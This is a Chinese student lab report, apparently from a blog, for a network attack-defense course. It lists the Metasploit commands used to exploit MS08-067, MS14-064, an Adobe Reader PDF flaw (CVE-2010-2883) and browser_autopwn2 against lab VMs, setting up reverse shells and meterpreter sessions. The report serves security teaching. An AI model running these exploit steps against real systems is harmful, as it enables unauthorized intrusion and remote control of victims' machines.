20202402 2021-2022-2 《网络与系统攻防技术》实验六实验报告

最新推荐文章于 2023-07-04 07:00:00 发布
最新推荐文章于 2023-07-04 07:00:00 发布
阅读量238 收藏
点赞数
文章标签: 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387301/article/details/130727429
版权

1. 实验内容

1.1 实验要求

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,尽量使用最新的类似漏洞;

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

1.4 成功应用任何一个辅助模块。

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的。

2. 实验过程

2.1 一个主动攻击实践,尽量使用最新的类似漏洞

MS08-067
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

msfconsole
search ms08_067
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOST 192.168.87.133
set LHOST 192.168.87.134

在这里插入图片描述
但是这里会报错,Exploit completed,but no session was created. 解决方法放文末了。

2.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞

MS14-064

msfconsole
search ms14_064
use exploit/windows/browser/ms14_064_ole_code_execution
set AllowPowershellPrompt true
set SRVHOST 192.168.87.134
set payload
run

这时他会给你一个攻击网址,如图在这里插入图片描述
在靶机浏览器打开这个网址
在这里插入图片描述
这时候攻击成功,使用sessions -i 1获得了靶机的shell,使用截屏命令截了一个屏也有显示
在这里插入图片描述
在这里插入图片描述

2.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞

CVE-2010-2883
Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。

msfconsole
search adobe_cooltype_sing 
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp   
set LHOST 192.168.87.134
set LPORT 2402
set FILENAME SBBCC.pdf
run

在这里插入图片描述
可以看到生成的pdf文件
在这里插入图片描述
在靶机里使用adobe reader打开这个pdf
在这里插入图片描述
这时候kali会显示攻击成功,获得shell
在这里插入图片描述

2.4 成功应用任何一个辅助模块

Browser Autopwn
Browser Autopwn 是由Metasploit提供的一个辅助模块。当访问一个Web页面时,它允许用户自动地攻击一个入侵主机。Browser Autopwn在攻击之前,会先进行指纹信息操作,这意味着它不会攻击Mozilla Firefox浏览器,而只会攻击系统自带的Internet Explorer7浏览器。

msfconsole
use auxiliary/server/browser_autopwn2

大致过程和任务2是一样的,也是生成一个网站,在靶机登录以后会获得靶机shell
在这里插入图片描述
在这里插入图片描述

3. 问题及解决方案

任务1里面Exploit completed,but no session was created报错,是因为没有设置target,Metaexploit会使用默认的Exploit Target 0,我的靶机系统是Windows XP SP3,需要设置target为34,就ok了
在这里插入图片描述
在这里插入图片描述

4.学习感悟

现在做了几次实验发现漏洞确实多,各种姿势获得靶机的shell有点意思,搞得我都想攻击别人了

BizetJr
关注
天津理工大学信息安全专业网络攻防实验3-Web攻击与防御
11-28
此外,通过亲自动手实践,加深了对网络攻防技术的理解,认识到网络安全的重要性,以及持续学习和改进防护策略的必要性。 实验过程记录: 在整个实验过程中,我们注意到捕获的数据包包含了登录时的用户名和密码尝试...
2022年最常被利用的十大漏洞
Innocence_0的博客
06-20 380
6月份,包括Kinsing、Hezb和Dark在内的几个僵尸网络使用Atlassian Confluence的远程执行漏洞(CVE-2022-26134),在未打补丁的安装系统上部署挖掘加密货币的恶意软件。现已得到修补的CVE-2022-0609是谷歌Chrome的动画组件中的远程代码执行漏洞,两起独立的与朝鲜有关的黑客活动(名为“Operation Dream Job”和“Operation AppleJeus”)利用了该漏洞,这两起黑客活动攻击美国的媒体、IT、加密货币和金融技术等行业的多家组织。
春秋云镜cve-2022-32991wp
CS160126的博客
06-27 578
春秋云镜cve-2022-32991
修复tomcat漏洞
hryzxjh的博客
06-25 4939
当前Tomcat存在漏洞Apache Tomcat 代码问题漏洞(CVE-2022-29885)Apache Tomcat 注入漏洞(CVE-2022-45143)Apache Tomcat 环境问题漏洞(CVE-2022-42252)Apache Tomcat 权限许可和访问控制问题漏洞(CVE-2022-23181)Apache Commons FileUpload 拒绝服务漏洞(CVE-2023-24998)Apache Tomcat 跨站脚本漏洞(CVE-2022-34305)
随着网络犯罪分子逃避云安全防御,无文件攻击激增
热门推荐
网络研究观
07-03 1万+
威胁行为者正在大量投入资源来隐藏活动并避免被发现,以便在受感染的系统中建立更牢固的立足点。
春秋云镜 CVE-2022-25578
qq_22002773的博客
06-30 245
春秋云镜 CVE-2022-25578
天津理工大学信息安全专业网络攻防实验2
11-28
实验报告详细介绍了天津理工大学信息安全专业的一次网络攻防实验,主要关注的是缓冲区溢出攻防技术。实验的目的是让参与者掌握Shellcode的编写流程,理解缓冲区溢出的原理,以及如何利用缓冲区溢出漏洞。实验工具是...
网络攻防课程seed-labs实验-Sniffing_Spoofing.zip
最新发布
06-01
网络攻防课程seed-labs实验-Sniffing_Spoofing.zip》是一个与网络安全相关的实验,主要聚焦在嗅探(Sniffing)和欺骗(Spoofing)这两个关键概念上。这两个技术网络攻防领域的重要组成部分,理解和掌握它们对于...
网络攻防课程seed-labs实验-Buffer_Overflow_Server.zip
06-01
网络攻防课程:深入理解Buffer Overflow Server》 在网络安全领域,Buffer Overflow是经典且重要的攻击手段之一。这个实验——“Buffer Overflow Server”,是网络攻防课程中的一个关键环节,旨在帮助学生理解并...
网络攻防课程seed-labs实验-TCP_Attacks.zip
06-01
【TCP攻击实验】是网络攻防课程中的一个重要环节,它主要关注网络安全领域中的TCP协议漏洞和防御策略。...同时,实验报告的编写也是对学习成果的总结和展示,能提高学生的分析和表达能力,加深对TCP攻防技术的理解。
记录一次vulhub:Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
sszsNo1的博客
06-29 223
vulhub:Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
字节跳动内推
HWHXY的博客
03-23 625
字节跳动内推
Sangfor华东天勇战队:CVE-2022-22947注入Spring内存马
bring_coco的博客
06-26 1693
中间的这一段’yv66vgAAA…'需要将class文件进行base64编码,如下。编译成SpringRequestMappingMemshell.class即可。刷新之后可以看到成功注册路由,也就相当于我们的内存马写了进去。接下来执行内存马,可以直接访问接口并输入命令,如下。
CVE-2022-23222 漏洞复现
qq_43472789的博客
06-09 724
2022年1月14日,一个编号为CVE-2022-23222的漏洞被公开,这是一个位于eBPF验证器中的漏洞,漏洞允许eBPF程序在未经验证的情况下对特定指针进行运算,通过精心构造的代码,可以实现任意内核内存读写,而这将会造成本地提权的风险。由于内核在执行用户提供的 eBPF 程序前缺乏适当的验证,攻击者可以利用这个漏洞获取 root 权限。该漏洞是由于 Linux 内核的 eBPF 验证器存在一个空指针漏洞,没有对*_OR_NULL指针类型进行限制,允许这些类型进行指针运算。
Goby漏洞更新|Apache ShenYu Admin plugin 接口未授权访问漏洞(CVE-2022-23944)
m0_46699477的博客
04-07 716
Apache ShenYu是美国阿帕奇(Apache)基金会的一个异步的,高性能的,跨语言的,响应式的 API 网关。Apache ShenYu 2.4.0 和 2.4.1存在访问控制错误漏洞,该漏洞源于用户无需身份验证即可访问 /plugin api。
春秋云镜 CVE-2022-25411
qq_22002773的博客
07-04 542
春秋云镜 CVE-2022-25578
Drools(CVE-2021-41411 && CVE-2022-1415)分析
GalaxySpaceX的博客
06-27 473
CVE-2021-41411 && CVE-2022-1415分析
i春秋,春秋云镜系列所有靶场
qq_47289634的博客
07-03 1682
该CMS的welcome.php中存在SQL注入攻击。多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。
春秋云镜 CVE-2022-29464
qq_22002773的博客
06-26 317
春秋云镜 CVE-2022-29464
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值